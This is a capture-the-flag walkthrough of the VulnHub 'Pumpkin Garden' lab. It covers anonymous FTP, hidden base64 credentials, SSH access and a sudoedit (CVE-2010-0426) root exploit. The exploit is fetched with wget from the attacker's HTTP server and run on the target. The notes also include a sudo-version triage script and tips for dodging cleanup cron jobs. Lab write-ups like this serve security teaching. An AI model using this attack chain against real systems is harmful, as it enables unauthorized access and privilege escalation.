NOTES ABOUT Pumpkin Garden

[ 2022-09-27 ] [ VulnHub / Pumpkin Garden ]

Status: Rooted
Skills: Port Scanning, FTP, SSH, Sudo Exploit
Tools: nmap

PORT SCANNING

$ nmap -v -sS -A -p- 10.0.2.6

[...]
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Mission-Pumpkin
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[...]

GETTING IN

$ ftp anonymous@10.0.2.8
Connected to 10.0.2.8.
220 Welcome to Pumpkin's FTP service.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||59974|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||53517|).
150 Opening BINARY mode data connection for note.txt (88 bytes).
100% |*************************************************************************************************************************| 88 1.35 MiB/s 00:00 ETA
226 Transfer complete.
88 bytes received in 00:00 (107.42 KiB/s)
ftp> quit
221 Goodbye.

$ cat note.txt 
Hello Dear!
Looking for route map to PumpkinGarden? I think jack can help you find it.

$ curl http://10.0.2.8:1515/

<html>
<head>
<title>Mission-Pumpkin</title>
<link rel="icon" href="img/favicon.ico" type="image/gif" sizes="16x16">
<style>
body {
background-color: #FCF0E4;
}
.center {
display: block;
margin-left: auto;
margin-right: auto;
width: 30%;
}

</style>
</head>
<body>
<img src= "img/pumpkin.gif" class="center" />

<center>
<p style="font-family: verdana; font-size: 120%;">
My dear friend, I <span style="font-size:100%;color:red;">&hearts;</span>
to sit on a pumpkin and have it all to myself,</br>
rather than sitting with a crowd on a velvet cushion. So, it is better you get one for yourself.</br></br>
<!-- searching for the route map? Pumpkin images may help you find the way -->
Please Don't disturb me... </br></br></br>
I can't help you in getting your pumpkin.</br>But, I found the route map to <b><i>PumpkinGarden</i></b> somewhere under the hood.
</p>
</center>


</body>
</html>

The HTML comment points at the image directory, and the clue file is not linked from the page. Listing img/ (if the server indexes it) or brute-forcing it with a directory wordlist turns up hidden_secret/clue.txt:

$ curl -L http://10.0.2.8:1515/img/hidden_secret/clue.txt
c2NhcmVjcm93IDogNVFuQCR5

$ echo "c2NhcmVjcm93IDogNVFuQCR5" | base64 -d
scarecrow : 5Qn@$y


$ ssh scarecrow@10.0.2.8 -p 3535
The authenticity of host '[10.0.2.8]:3535 ([10.0.2.8]:3535)' can't be established.
ED25519 key fingerprint is SHA256:mLTE3ZDFS+c1wgTIsHLdH7jtZFKpYoPljQRHRdH7IVo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.0.2.8]:3535' (ED25519) to the list of known hosts.

------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
scarecrow@10.0.2.8's password: 5Qn@$y
Last login: Thu Jun 13 00:35:51 2019 from 192.168.1.106

scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txt

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.


scarecrow@Pumpkin:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
jack:x:1000:1000:jack,,,:/home/jack:/bin/bash
scarecrow:x:1001:1001:Scarecrow,,,:/home/scarecrow:/bin/bash
goblin:x:1002:1002:Goblin,,,:/home/goblin:/bin/bash
scarecrow@Pumpkin:~$ su goblin
Password: Y0n$M4sy3D1t
goblin@Pumpkin:/home/scarecrow$

goblin@Pumpkin:/$ cd /home/goblin/
goblin@Pumpkin:~$ ls
note
goblin@Pumpkin:~$ cat note

Hello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.

Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

ELEVATING PRIVILEGES

PREPARING EXPLOIT

BID 38362 and EDB-ID 11651 are the same bug, CVE-2010-0426: sudo matched a sudoers "sudoedit" pseudo-command against any executable named sudoedit, so a user granted sudoedit could run a file of that name as root. Pull the script down on the attacker box and serve it over HTTP:

$ searchsploit -m 11651
$ python3 -m http.server

GETTING EXPLOIT

goblin@Pumpkin:~$ wget 10.0.2.15:8000/11651.sh
goblin@Pumpkin:~$ chmod +x 11651.sh
goblin@Pumpkin:~$ ./11651.sh 1
Tod Miller Sudo local root exploit
by Slouching
automated by kingcope
ALEX-ALEX
root@Pumpkin:/tmp#
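Before pointing a 2010-era exploit at a box it is worth confirming its preconditions rather than trusting the note. The following triage helper is an added example, not part of these notes and not the 11651.sh script: it parses the sudo version into the range the sudo advisory gives for CVE-2010-0426 (1.6.9 below p21 through 1.7.2p3; 1.6.9p21 and 1.7.2p4 carry the fix) and checks whether "sudo -l" actually grants a sudoedit pseudo-command. The sample "sudo -l" lines used for the checks are constructed.

```shell
#!/bin/sh
# Added triage helper (not part of the original notes and not exploit 11651.sh).
# Before running a sudoedit exploit (BID 38362 / CVE-2010-0426) against a host,
# confirm the two preconditions it relies on: the sudo version is in the
# affected range, and the policy actually grants this user a "sudoedit"
# pseudo-command. Sample "sudo -l" lines in the comments below are constructed.

# Print "major minor patch plevel" for a sudo version string such as "1.6.9p20".
# A version without a "pN" suffix counts as p0.
sudo_version_fields() {
    plevel=0
    case $1 in
        *p*) plevel=${1##*p}; base=${1%p*} ;;
        *)   base=$1 ;;
    esac
    set -- $(printf '%s' "$base" | tr '.' ' ')
    printf '%s %s %s %s\n' "${1:-0}" "${2:-0}" "${3:-0}" "$plevel"
}

# Returns 0 when VERSION is in the range the sudo advisory lists for
# CVE-2010-0426: 1.6.9 (any p-level below p21) through 1.7.2p3.
# 1.6.9p21 and 1.7.2p4 carry the fix; 1.8.x was never affected.
sudo_vulnerable_cve_2010_0426() {
    set -- $(sudo_version_fields "$1")
    maj=$1; min=$2; pat=$3; plv=$4
    if [ "$maj" -eq 1 ] && [ "$min" -eq 6 ] && [ "$pat" -eq 9 ] && [ "$plv" -lt 21 ]; then
        return 0
    fi
    if [ "$maj" -eq 1 ] && [ "$min" -eq 7 ]; then
        if [ "$pat" -lt 2 ] || { [ "$pat" -eq 2 ] && [ "$plv" -lt 4 ]; }; then
            return 0
        fi
    fi
    return 1
}

# Returns 0 when a "sudo -l" listing on stdin grants the sudoedit pseudo-command,
# e.g. "    (ALL) NOPASSWD: sudoedit /etc/hosts" or "    (root) sudoedit"
# (constructed sample lines). A plain editor grant such as /usr/bin/vim is not
# the same bug and does not match.
sudo_l_grants_sudoedit() {
    if grep -qE '^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?sudoedit([[:space:]]|$)'; then
        return 0
    fi
    return 1
}

# Live check on the current host. Uses only "sudo -V" and non-interactive
# "sudo -n -l", so it never hangs on a password prompt.
check_this_host() {
    ver=$(sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p')
    if [ -z "$ver" ]; then
        echo "sudo not found or not runnable; nothing to check"
        return 0
    fi
    if sudo_vulnerable_cve_2010_0426 "$ver"; then
        echo "sudo $ver: version is in the CVE-2010-0426 range"
    else
        echo "sudo $ver: version is NOT in the CVE-2010-0426 range"
    fi
    if sudo -n -l 2>/dev/null | sudo_l_grants_sudoedit; then
        echo "policy grants sudoedit to $(id -un): exploit precondition met"
    else
        echo "no sudoedit grant visible for $(id -un) (or sudo -l needs a password)"
    fi
}

check_this_host
```

Run it as the low-privilege user on the target (it has no dependencies beyond sh, grep, sed and tr, so it survives on a 14.04-era box). If the version is outside the range, a successful run of 11651.sh means the policy, not the version bug, is what hands out root, and that is worth recording in the notes.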

root@Pumpkin:/tmp# cd /root/
root@Pumpkin:~# ls
PumpkinGarden_Key
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# cat PumpkinGarden_Key | base64 -d
Congratulations!

HURRY UP!

root@Pumpkin:/tmp# crontab -l
[...]
* * * * * rm /home/goblin/*.*
* * * * * sleep 15; rm /home/goblin/*.*
* * * * * sleep 30; rm /home/goblin/*.*
* * * * * rm /tmp/*
* * * * * sleep 15; rm /tmp/*
* * * * * sleep 30; rm /tmp/*

Root's crontab wipes goblin's home directory and /tmp every 15 seconds, which is why the exploit has to be fetched and run inside that window. Two details of the jobs matter in practice: "rm /home/goblin/*.*" only matches names containing a dot (goblin's "note" survives, "11651.sh" does not), and "rm /tmp/*" without -r does not remove directories. A dotless filename in the home directory, or a subdirectory under /tmp, outlives the cleanup.
